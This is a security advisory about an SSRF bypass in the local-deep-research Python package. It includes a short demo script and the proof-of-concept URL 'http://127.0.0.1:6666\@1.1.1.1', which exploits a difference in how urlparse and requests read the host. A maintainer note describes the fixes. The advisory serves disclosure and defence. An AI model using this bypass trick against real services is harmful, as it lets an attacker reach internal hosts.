GHSA-g23j-2vwm-5c25MediumCVSS 5.0

local-deep-research has an SSRF bypass in `safe_get`

Published
May 28, 2026
Last Modified
May 28, 2026

🔗 CVE IDs covered (1)

📋 Description

Summary

The URL checking logic in local-deep-research has a logical flaw that could be bypassed by attackers, leading to SSRF attacks.

Details

The current project uses validate_url to validate the input URL. The main logic is to perform security checks on the host portion of the URL extracted by urlparse to prevent SSRF attacks.

However, there are indeed differences in parsing between urlparse and the library that actually sends the request. For example, in safe_get, validate_url is first used to perform an SSRF check, and then requests.get is used to send the actual request.

The core issue: urlparse() and requests disagree on which host a URL like http://127.0.0.1:6666\@1.1.1.1 points to:

  • urlparse() treats \ as a regular character and @ as the userinfo-host delimiter, so it extracts hostname as 1.1.1.1 (public)
  • requests treats \ as a path character, connecting to 127.0.0.1 (internal)

Below is a test code I wrote following the code.

#!/usr/bin/env python3
"""Standalone demo: import project via absolute path and call safe_get."""

from __future__ import annotations

import importlib.util
import enum
import sys
import types
from pathlib import Path

# Hardcoded absolute path to the project's "src" directory.
SRC_ROOT = Path(
    r"d:\BaiduNetdiskDownload\local-deep-research-main\local-deep-research-main\src"
)

# Python 3.10 compatibility:
# project constants import StrEnum (available in Python 3.11+).
if not hasattr(enum, "StrEnum"):
    class _CompatStrEnum(str, enum.Enum):
        pass

    enum.StrEnum = _CompatStrEnum  # type: ignore[attr-defined]


def _load_safe_get():
    """Load safe_get directly from file, bypassing package __init__ imports."""
    ldr_pkg_name = "local_deep_research"
    security_pkg_name = "local_deep_research.security"

    # Build lightweight package modules so relative imports in safe_requests.py
    # resolve without executing package __init__.py files.
    if ldr_pkg_name not in sys.modules:
        ldr_pkg = types.ModuleType(ldr_pkg_name)
        ldr_pkg.__path__ = [str(SRC_ROOT / "local_deep_research")]  # type: ignore[attr-defined]
        sys.modules[ldr_pkg_name] = ldr_pkg

    if security_pkg_name not in sys.modules:
        security_pkg = types.ModuleType(security_pkg_name)
        security_pkg.__path__ = [str(SRC_ROOT / "local_deep_research" / "security")]  # type: ignore[attr-defined]
        sys.modules[security_pkg_name] = security_pkg

    module_name = "local_deep_research.security.safe_requests"
    module_path = SRC_ROOT / "local_deep_research" / "security" / "safe_requests.py"

    spec = importlib.util.spec_from_file_location(module_name, module_path)
    if spec is None or spec.loader is None:
        raise ImportError(f"Cannot load module from {module_path}")

    module = importlib.util.module_from_spec(spec)
    sys.modules[module_name] = module
    spec.loader.exec_module(module)
    return module.safe_get


safe_get = _load_safe_get()


def main() -> None:
    # Hardcoded URL for demonstration.
    url = "http://127.0.0.1:6666"
    # url = "http://127.0.0.1:6666\@1.1.1.1"

    safe_get(url, timeout=15)


if __name__ == "__main__":
    main()

When an attacker uses http://127.0.0.1:6666/, the existing detection logic can detect that this is an internal network address and block it.

However, when an attacker uses http://127.0.0.1:6666\@1.1.1.1, the detection logic resolves the host to 1.1.1.1, which is a public IP address, thus passing the verification. But in the actual request process, this URL is forwarded by requests.get to http://127.0.0.1:6666, bypassing the detection and achieving an SSRF attack.

PoC

http://127.0.0.1:6666\@1.1.1.1

Impact

SSRF


Maintainer note (2026-05-15)

Thanks @Fushuling and @RacerZ-fighting for the detailed report. The remediation spans four PRs, all merged to main and shipped in v1.6.10:

#3873 (merged 2026-05-08) — the load-bearing fix for the parser-differential bypass:

  • New RFC_FORBIDDEN_URL_CHARS_RE in security/ssrf_validator.py rejects URLs containing backslash, ASCII control bytes, or whitespace — RFC 3986 forbids these and their presence signals a parser-differential attempt.
  • Host extraction switched from urllib.parse.urlparse(url).hostname to urllib3.util.parse_url(url).host. urllib3 is the parser requests uses internally, so the validator and the HTTP client now agree on the destination by construction — closing the \@ divergence that drove the PoC.
  • Same two-layer defence applied to NotificationURLValidator.validate_service_url.
  • 53 new tests across test_ssrf_validator.py, test_notification_validator.py, test_safe_requests.py, and test_ssrf_redirect_bypass.py, including the advisory PoC http://127.0.0.1:6666\@1.1.1.1 and the post-prepare canonical form http://127.0.0.1:6666/%5C@1.1.1.1.

#3882 (merged 2026-05-08) — hardens the metadata-IP block and redacts userinfo from log output so rejected URLs don't leak credentials to logs.

#3889 (merged 2026-05-09) — locks in real-world URL fixtures and behavior invariants from #3873/#3882 as regression tests.

#3932 (merged 2026-05-10) — blocks IPv6 transition prefixes (2002::/16 6to4, 64:ff9b::/96 NAT64, 2001::/32 Teredo, 100::/64 discard) so private IPv4 destinations cannot be reached via an IPv6-wrapped form. NAT64 has an operator opt-in (LDR_SECURITY_ALLOW_NAT64=true) for IPv6-only deployments, but cloud metadata IPs remain blocked regardless.

Affected versions

  • The specific parser-differential bypass described above exists from v1.3.0 (when validate_url was first introduced) through v1.6.9. The validator used urlparse(url).hostname for that entire span.
  • Versions before v1.3.0 had no SSRF validator at all — requests went directly to requests.get() without any host check. Those versions are vulnerable to SSRF via this URL and any other internal address; the parser-differential trick is unnecessary.

In both cases the remediation is the same: upgrade to v1.6.10 or later.

🎯 Affected products1

  • pip/local-deep-research:< 1.6.10

🔗 References (3)